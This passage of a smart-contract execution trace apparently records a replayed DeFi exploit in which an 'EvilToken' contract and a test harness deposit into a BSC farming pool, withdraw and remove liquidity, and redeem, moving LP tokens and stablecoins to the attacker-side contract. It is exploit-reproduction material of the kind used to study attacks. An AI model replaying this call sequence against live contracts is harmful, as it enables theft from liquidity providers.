    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   ├─ [47125] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4::mint(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4)
    │   │   │   │   │   │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 212475211411045988596436 [2.124e23]
    │   │   │   │   │   │   │   │   │   │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 212780584196231560435466 [2.127e23]
    │   │   │   │   │   │   │   │   │   │   ├─ [2338] 0xa0a33e6a7D8961e4D8210A70bc67d3E7b0e8135f::feeTo() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000
    │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, value: 9918921268034103877763 [9.918e21])
    │   │   │   │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 212475211411045988596436 [2.124e23], reserve1: 212780584196231560435466 [2.127e23])
    │   │   │   │   │   │   │   │   │   │   ├─ emit Mint(sender: 0x48Bb5f07e78f32Ac7039366533D620C72c389797, amount0: 9985648465702869325612 [9.985e21], amount1: 10000000000000000000000 [1e22])
    │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   @ 10: 0x00000000000000000000000000000076422a937cae5e5aee7b84e2112c9ea4ad → 0x0000000000000000000000000000007643054306ced96be05d0abcd295fc2983
    │   │   │   │   │   │   │   │   │   │   │   @ 9: 0x000000000000000000000000000000765060b5459ca1a290e614e2d59cf9ef62 → 0x00000000000000000000000000000076513c05d916abb3c9c5fb7328fb2630ca
    │   │   │   │   │   │   │   │   │   │   │   @ 0x949abb87b7a138e5fee718fe3f6e64ef0369ce48ab830f598178c281d059a15a: 0x000000000000000000000000000000000000000000002a6870dd58afe6f97536 → 0x000000000000000000000000000000000000000000002c82258c9d4456e095b9
    │   │   │   │   │   │   │   │   │   │   │   @ 8: 0x622d3430000000002af0c1eb44e44c38170a000000002ae0fb30171afcd9a3a8 → 0x622d350b000000002d0edbcc0e9efe78170a000000002cfe4de5fc6ddcca7ad4
    │   │   │   │   │   │   │   │   │   │   │   @ 0: 0x000000000000000000000000000000000000000000002a97a12e45c0af2e726c → 0x000000000000000000000000000000000000000000002cb155dd8a551f1592ef
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 9918921268034103877763 [9.918e21]
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 12: 0 → 1
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 9985648465702869325612 [9.985e21], 10000000000000000000000 [1e22], 9918921268034103877763 [9.918e21]
    │   │   │   │   │   │   │   │   ├─ [492] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4::balanceOf(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 210184907686239614834105 [2.101e23]
    │   │   │   │   │   │   │   │   ├─ [7246] 0x43Feaca246392C23EE5A0Db618fCd81a74b91726::5cbc4a24() [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000327f28cab3945e0000
    │   │   │   │   │   │   │   │   ├─ [23925] 0x43Feaca246392C23EE5A0Db618fCd81a74b91726::mint(0x7d87431a752c6C8720051103f532fe43F368F1ba, 243763430071009570855 [2.437e20])
    │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x7d87431a752c6C8720051103f532fe43F368F1ba, value: 243763430071009570855 [2.437e20])
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 0x28a4e9bcffaa1dec2834f88d2519b782424342ea5d0fb5863b54f2e563101af1: 0x0000000000000000000000000000000000000000007afb38fa9630ce847ae763 → 0x0000000000000000000000000000000000000000007afb46317bdcf139c7578a
    │   │   │   │   │   │   │   │   │   │   @ 2: 0x000000000000000000000000000000000000000004cdd039c9dde8112ccd61c6 → 0x000000000000000000000000000000000000000004cdd04700c39433e219d1ed
    │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   ├─ [13125] 0x43Feaca246392C23EE5A0Db618fCd81a74b91726::mint(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, 2193870870639086137696 [2.193e21])
    │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, value: 2193870870639086137696 [2.193e21])
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 0x080bfba2d6f9fc5340613a8583096a35b10eef61cf32669d7c39215f67eb380e: 0x000000000000000000000000000000000000000000e6c568008675fcc3934f5b → 0x000000000000000000000000000000000000000000e6c5deee998335234340bb
    │   │   │   │   │   │   │   │   │   │   @ 2: 0x000000000000000000000000000000000000000004cdd04700c39433e219d1ed → 0x000000000000000000000000000000000000000004cdd0bdeed6a16c41c9c34d
    │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   ├─ emit Deposit(user: EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], pid: 18, amount: 9918921268034103877763 [9.918e21])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x88e6b34a9da5734764bc73a1b7fed323f0524363100464383b6519b7991e6d18: 0x0000000000000000000000000000000000000000000000015564c1a9e29c0000 → 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000
    │   │   │   │   │   │   │   │   │   @ 0x241abd1785b660ccdd4316306d4aac1adefb5d33a1134e74c5a7b8a10e95627a: 0 → 0x000000000000000000000000000000000000000000000000c72ae467d24f28d4
    │   │   │   │   │   │   │   │   │   @ 0x3e0faa4672b2242f71b6306552c5e02c7337a1c527fb60c0cb6ce20cd20885d4: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffde1e61f36454dbfffff
    │   │   │   │   │   │   │   │   │   @ 0xd7b6990105719101dabeb77144f2a3385c8033acd3af97e9423a695e81ad1f23: 0x0000000000000000000000000000000000000000000000000000000000f4440f → 0x0000000000000000000000000000000000000000000000000000000000f44458
    │   │   │   │   │   │   │   │   │   @ 0x4240b115d3574d496278014261310cc0896167bef97ca0867c8a023d98f4de50: 0 → 0x000000000000000000000000000000000000000000000219b4af44946fe72083
    │   │   │   │   │   │   │   │   │   @ 0xd7b6990105719101dabeb77144f2a3385c8033acd3af97e9423a695e81ad1f24: 0x0000000000000000000000000000000000000000000000000002578baf6ecd31 → 0x0000000000000000000000000000000000000000000000000002578de16acfa3
    │   │   │   │   │   │   │   │   │   @ 0x4240b115d3574d496278014261310cc0896167bef97ca0867c8a023d98f4de51: 0 → 0x0000000000000000000000000000000000000000000568a0b76a14ecf4a62edf
    │   │   │   │   │   │   │   │   │   @ 0x8766097a2ede1c4002a90c813bc6572b42330a7996158a3c747c5fb5111bbe7f: 0x000000000000000000000000000000000000000000002f2c214839a531e7114f → 0x000000000000000000000000000000000000000000003145d5f77e39a1ce31d2
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   └─ ← [Return]
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x3e0faa4672b2242f71b6306552c5e02c7337a1c527fb60c0cb6ce20cd20885d4: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [123052] 0xA5E89E269A0DF68B87548e142a7f555ed5f2Da56::mint(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4)
    │   │   │   │   │   │   ├─ [641] EvilToken::balanceOf(0xA5E89E269A0DF68B87548e142a7f555ed5f2Da56) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 1111
    │   │   │   │   │   │   ├─ [641] EvilToken::balanceOf(0xA5E89E269A0DF68B87548e142a7f555ed5f2Da56) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 1111
    │   │   │   │   │   │   ├─ [338] 0xa0a33e6a7D8961e4D8210A70bc67d3E7b0e8135f::feeTo() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x0000000000000000000000000000000000000000, value: 1000)
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, value: 111)
    │   │   │   │   │   │   ├─ emit Sync(reserve0: 1111, reserve1: 1111)
    │   │   │   │   │   │   ├─ emit Mint(sender: 0x48Bb5f07e78f32Ac7039366533D620C72c389797, amount0: 1111, amount1: 1111)
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 8: 0 → 0x622d350b00000000000000000000000004570000000000000000000000000457
    │   │   │   │   │   │   │   @ 0xa6eef7e35abe7026729641147f7915573c7e97b47efa546f5f6e3230263bcb49: 0 → 1000
    │   │   │   │   │   │   │   @ 0: 0 → 1111
    │   │   │   │   │   │   │   @ 0x949abb87b7a138e5fee718fe3f6e64ef0369ce48ab830f598178c281d059a15a: 0 → 111
    │   │   │   │   │   │   └─ ← [Return] 111
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 12: 0 → 1
    │   │   │   │   │   └─ ← [Return] 1, 1, 111
    │   │   │   │   ├─ [492] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4::balanceOf(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4) [staticcall]
    │   │   │   │   │   └─ ← [Return] 210184907686239614834105 [2.101e23]
    │   │   │   │   ├─ emit Deposit(user: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], pid: 18, amount: 9918921268034103877763 [9.918e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x511d19af8e36e5f64240fd7cf81c796a3388caf63a9b1ec2bee4d9aaeaefde77: 0 → 0x0000000000000000000000000000000000000000000568a0b76a14ecf4a62edf
    │   │   │   │   │   @ 0x8766097a2ede1c4002a90c813bc6572b42330a7996158a3c747c5fb5111bbe7f: 0x000000000000000000000000000000000000000000003145d5f77e39a1ce31d2 → 0x00000000000000000000000000000000000000000000335f8aa6c2ce11b55255
    │   │   │   │   │   @ 0x511d19af8e36e5f64240fd7cf81c796a3388caf63a9b1ec2bee4d9aaeaefde76: 0 → 0x000000000000000000000000000000000000000000000219b4af44946fe72083
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return]
    │   │   ├─ [1428] 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4::userInfo(18, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   ├─ [872] 0xA386F30853A7EB7E6A25eC8389337a5C6973421D::userInfo(18, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   └─ ← [Return] 9918921268034103877763 [9.918e21], 6538719907742446925524703 [6.538e24]
    │   │   │   └─ ← [Return] 9918921268034103877763 [9.918e21], 6538719907742446925524703 [6.538e24]
    │   │   ├─ [279623] 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4::withdrawAndRemoveLiquidity(18, 9918921268034103877763 [9.918e21], false)
    │   │   │   ├─ [279067] 0xA386F30853A7EB7E6A25eC8389337a5C6973421D::withdrawAndRemoveLiquidity(18, 9918921268034103877763 [9.918e21], false) [delegatecall]
    │   │   │   │   ├─ [601] 0x43Feaca246392C23EE5A0Db618fCd81a74b91726::balanceOf(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4) [staticcall]
    │   │   │   │   │   └─ ← [Return] 278987357078591710521671867 [2.789e26]
    │   │   │   │   ├─ [54467] 0x43Feaca246392C23EE5A0Db618fCd81a74b91726::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   │   │   │   ├─ emit Transfer(from: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xf9ce09b108db692395053dd01a39433c7f523275c08f1ea50eeae7dbb44c41d3: 0 → 0x0000000000000000000000000000000000000000000000000000000000f44458
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [4686] 0x43Feaca246392C23EE5A0Db618fCd81a74b91726::approve(0x49a6FD247022e073AcD740225304270274BA3075, 0)
    │   │   │   │   │   ├─ emit Approval(owner: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, spender: 0x49a6FD247022e073AcD740225304270274BA3075, value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [5426] 0x49a6FD247022e073AcD740225304270274BA3075::47c7357b(0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e149600000000000000000000000043feaca246392c23ee5a0db618fcd81a74b917260000000000000000000000000000000000000000000000000000000000000000)
    │   │   │   │   │   ├─ [370] 0xc7D4253E79FD16D3d24b674899D97F2d953d0029::47c7357b(0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e149600000000000000000000000043feaca246392c23ee5a0db618fcd81a74b917260000000000000000000000000000000000000000000000000000000000000000) [delegatecall]
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   └─ ← [Return]
    │   │   │   │   ├─ [24510] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4::approve(0x49a6FD247022e073AcD740225304270274BA3075, 49594606340170519388 [4.959e19])
    │   │   │   │   │   ├─ emit Approval(owner: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, spender: 0x49a6FD247022e073AcD740225304270274BA3075, value: 49594606340170519388 [4.959e19])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x5161f710e94971abb07f6d1f607cf9904eb1d720d431e32ed544cf5cb81375e6: 0 → 0x000000000000000000000000000000000000000000000002b0436fb3f133135c
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [47309] 0x49a6FD247022e073AcD740225304270274BA3075::539e90f8(0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000003fd4fbd7a83062942b6589a2e9e2436dd8e134d4000000000000000000000000000000000000000000000002b0436fb3f133135c000000000000000000000000000000000000000000000219b4af44946fe72083)
    │   │   │   │   │   ├─ [46747] 0xc7D4253E79FD16D3d24b674899D97F2d953d0029::539e90f8(0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000003fd4fbd7a83062942b6589a2e9e2436dd8e134d4000000000000000000000000000000000000000000000002b0436fb3f133135c000000000000000000000000000000000000000000000219b4af44946fe72083) [delegatecall]
    │   │   │   │   │   │   ├─ [25936] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4::transferFrom(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, 0x49a6FD247022e073AcD740225304270274BA3075, 49594606340170519388 [4.959e19])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, to: 0x49a6FD247022e073AcD740225304270274BA3075, value: 49594606340170519388 [4.959e19])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x949abb87b7a138e5fee718fe3f6e64ef0369ce48ab830f598178c281d059a15a: 0x000000000000000000000000000000000000000000002c82258c9d4456e095b9 → 0x000000000000000000000000000000000000000000002c7f75492d9065ad825d
    │   │   │   │   │   │   │   │   @ 0x9f061f44f844022a7ced68b2e4d2dcc2f54ad18a6d158ef0188c7f6e8b8255ce: 0 → 0x000000000000000000000000000000000000000000000002b0436fb3f133135c
    │   │   │   │   │   │   │   │   @ 0x5161f710e94971abb07f6d1f607cf9904eb1d720d431e32ed544cf5cb81375e6: 0x000000000000000000000000000000000000000000000002b0436fb3f133135c → 0
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [7988] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4::transfer(0xb048DD82f0Ec1c52FD2965aE7Cee273d75CE3023, 49594606340170519388 [4.959e19])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x49a6FD247022e073AcD740225304270274BA3075, to: 0xb048DD82f0Ec1c52FD2965aE7Cee273d75CE3023, value: 49594606340170519388 [4.959e19])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x9f061f44f844022a7ced68b2e4d2dcc2f54ad18a6d158ef0188c7f6e8b8255ce: 0x000000000000000000000000000000000000000000000002b0436fb3f133135c → 0
    │   │   │   │   │   │   │   │   @ 0x4c368d3d8a633b0599f06edf002f3018569547acd36856864c15e9fae272ed64: 0x000000000000000000000000000000000000000000000019224e8ed21cf97d5f → 0x00000000000000000000000000000000000000000000001bd291fe860e2c90bb
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─  emit topic 0: 0xa3d2f08ae96a7de361b4da83bb78eb768211a181b0425e02dd0bcda7088a722f
    │   │   │   │   │   │   │        topic 1: 0x000000000000000000000000b048dd82f0ec1c52fd2965ae7cee273d75ce3023
    │   │   │   │   │   │   │        topic 2: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │   │   │        topic 3: 0x0000000000000000000000000000000000000000000000000000000000000003
    │   │   │   │   │   │   │           data: 0x0000000000000000000000003fd4fbd7a83062942b6589a2e9e2436dd8e134d4000000000000000000000000000000000000000000000002b0436fb3f133135c
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x4c368d3d8a633b0599f06edf002f3018569547acd36856864c15e9fae272ed64: 0x000000000000000000000000000000000000000000000019224e8ed21cf97d5f → 0x00000000000000000000000000000000000000000000001bd291fe860e2c90bb
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   └─ ← [Return]
    │   │   │   │   ├─ [2605] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4::allowance(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, 0x48Bb5f07e78f32Ac7039366533D620C72c389797) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [22410] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4::approve(0x48Bb5f07e78f32Ac7039366533D620C72c389797, 9869326661693933358375 [9.869e21])
    │   │   │   │   │   ├─ emit Approval(owner: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, spender: 0x48Bb5f07e78f32Ac7039366533D620C72c389797, value: 9869326661693933358375 [9.869e21])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x88e6b34a9da5734764bc73a1b7fed323f0524363100464383b6519b7991e6d18: 0 → 0x000000000000000000000000000000000000000000000217046bd4e07eb40d27
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [449] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4::token0() [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x55d398326f99059fF775485246999027B3197955
    │   │   │   │   ├─ [381] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4::token1() [staticcall]
    │   │   │   │   │   └─ ← [Return] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56
    │   │   │   │   ├─ [93313] 0x48Bb5f07e78f32Ac7039366533D620C72c389797::removeLiquidity(0x55d398326f99059fF775485246999027B3197955, 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56, 9869326661693933358375 [9.869e21], 1, 1, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1647130467 [1.647e9])
    │   │   │   │   │   ├─ [25936] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4::transferFrom(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4, 9869326661693933358375 [9.869e21])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, to: 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4, value: 9869326661693933358375 [9.869e21])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x949abb87b7a138e5fee718fe3f6e64ef0369ce48ab830f598178c281d059a15a: 0x000000000000000000000000000000000000000000002c7f75492d9065ad825d → 0x000000000000000000000000000000000000000000002a6870dd58afe6f97536
    │   │   │   │   │   │   │   @ 0x88e6b34a9da5734764bc73a1b7fed323f0524363100464383b6519b7991e6d18: 0x000000000000000000000000000000000000000000000217046bd4e07eb40d27 → 0
    │   │   │   │   │   │   │   @ 0x1c20e7a300ae02ff050ab1b946e3cf95cf881d0a0308f7a7fb80044618a7d993: 0 → 0x000000000000000000000000000000000000000000000217046bd4e07eb40d27
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [64832] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4::burn(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 212475211411045988596436 [2.124e23]
    │   │   │   │   │   │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 212780584196231560435466 [2.127e23]
    │   │   │   │   │   │   ├─ [338] 0xa0a33e6a7D8961e4D8210A70bc67d3E7b0e8135f::feeTo() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4, to: 0x0000000000000000000000000000000000000000, value: 9869326661693933358375 [9.869e21])
    │   │   │   │   │   │   ├─ [23171] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 9935720223374354978984 [9.935e21])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 9935720223374354978984 [9.935e21])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000021a9dd12575053898a8
    │   │   │   │   │   │   │   │   @ 0x1c20e7a300ae02ff050ab1b946e3cf95cf881d0a0308f7a7fb80044618a7d993: 0x000000000000000000000000000000000000000000002cfe4de5fc6ddcca7ad4 → 0x000000000000000000000000000000000000000000002ae3b014d6f8d791e22c
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [23171] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 9950000000000000000000 [9.95e21])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 9950000000000000000000 [9.95e21])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x1c20e7a300ae02ff050ab1b946e3cf95cf881d0a0308f7a7fb80044618a7d993: 0x000000000000000000000000000000000000000000002d0edbcc0e9efe78170a → 0x000000000000000000000000000000000000000000002af377cef3fafdc0170a
    │   │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000021b63fd1aa400b80000
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 202539491187671633617452 [2.025e23]
    │   │   │   │   │   │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 202830584196231560435466 [2.028e23]
    │   │   │   │   │   │   ├─ emit Sync(reserve0: 202539491187671633617452 [2.025e23], reserve1: 202830584196231560435466 [2.028e23])
    │   │   │   │   │   │   ├─ emit Burn(sender: 0x48Bb5f07e78f32Ac7039366533D620C72c389797, amount0: 9935720223374354978984 [9.935e21], amount1: 9950000000000000000000 [9.95e21], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 8: 0x622d350b000000002d0edbcc0e9efe78170a000000002cfe4de5fc6ddcca7ad4 → 0x622d350b000000002af377cef3fafdc0170a000000002ae3b014d6f8d791e22c
    │   │   │   │   │   │   │   @ 0x1c20e7a300ae02ff050ab1b946e3cf95cf881d0a0308f7a7fb80044618a7d993: 0x000000000000000000000000000000000000000000000217046bd4e07eb40d27 → 0
    │   │   │   │   │   │   │   @ 0: 0x000000000000000000000000000000000000000000002cb155dd8a551f1592ef → 0x000000000000000000000000000000000000000000002a9a5171b574a06185c8
    │   │   │   │   │   │   └─ ← [Return] 9935720223374354978984 [9.935e21], 9950000000000000000000 [9.95e21]
    │   │   │   │   │   └─ ← [Return] 9935720223374354978984 [9.935e21], 9950000000000000000000 [9.95e21]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x5161f710e94971abb07f6d1f607cf9904eb1d720d431e32ed544cf5cb81375e6: 0 → 0x000000000000000000000000000000000000000000000002b0436fb3f133135c
    │   │   │   │   │   @ 0x4c368d3d8a633b0599f06edf002f3018569547acd36856864c15e9fae272ed64: 0x000000000000000000000000000000000000000000000019224e8ed21cf97d5f → 0x00000000000000000000000000000000000000000000001bd291fe860e2c90bb
    │   │   │   │   │   @ 0x511d19af8e36e5f64240fd7cf81c796a3388caf63a9b1ec2bee4d9aaeaefde76: 0x000000000000000000000000000000000000000000000219b4af44946fe72083 → 0
    │   │   │   │   │   @ 0x511d19af8e36e5f64240fd7cf81c796a3388caf63a9b1ec2bee4d9aaeaefde77: 0x0000000000000000000000000000000000000000000568a0b76a14ecf4a62edf → 0
    │   │   │   │   │   @ 0x8766097a2ede1c4002a90c813bc6572b42330a7996158a3c747c5fb5111bbe7f: 0x00000000000000000000000000000000000000000000335f8aa6c2ce11b55255 → 0x000000000000000000000000000000000000000000003145d5f77e39a1ce31d2
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return]
    │   │   ├─ [21123] 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4::withdrawChange([0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56, 0x55d398326f99059fF775485246999027B3197955])
    │   │   │   ├─ [20561] 0xA386F30853A7EB7E6A25eC8389337a5C6973421D::withdrawChange([0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56, 0x55d398326f99059fF775485246999027B3197955]) [delegatecall]
    │   │   │   │   ├─ [3271] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   │   │   │   ├─ emit Transfer(from: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ emit WithdrawChange(user: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], token: 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56, change: 0)
    │   │   │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   │   │   │   ├─ emit Transfer(from: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ emit WithdrawChange(user: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], token: 0x55d398326f99059fF775485246999027B3197955, change: 0)
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return]
    │   │   ├─ [253310] EvilToken::redeem()
